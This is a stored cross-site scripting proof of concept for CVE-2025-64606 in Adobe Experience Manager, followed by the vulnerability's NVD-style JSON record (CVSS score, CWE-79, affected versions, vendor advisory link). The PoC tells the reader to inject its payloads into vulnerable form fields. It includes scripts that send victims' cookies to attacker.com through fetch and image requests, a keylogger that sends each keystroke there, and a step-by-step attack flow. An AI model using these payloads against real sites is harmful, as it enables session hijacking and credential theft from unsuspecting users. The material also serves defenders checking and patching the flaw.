CVE-2025-64606

<!-- Stored XSS PoC for CVE-2025-64606 --> <!-- Inject this payload into vulnerable form fields in Adobe Experience Manager --> <!-- Basic XSS payload --> <script>alert(document.domain)</script> <!-- Cookie stealing payload --> <img src=x onerror="fetch('https://attacker.com/steal?c='+btoa(document.cookie))"> <!-- Session hijacking payload --> <script> var img = new Image(); img.src = 'https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie); </script> <!-- Keylogger payload --> <script> document.addEventListener('keypress', function(e) { fetch('https://attacker.com/keys?k=' + e.key); }); </script> <!-- Example attack flow: 1. Attacker logs in with low-privileged account 2. Attacker submits malicious payload in form field 3. Payload is stored on server without sanitization 4. Victim views the page containing the vulnerable field 5. Malicious JavaScript executes in victim's browser -->

{"cve": {"id": "CVE-2025-64606", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:24.640", "lastModified": "2025-12-12T17:41:50.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}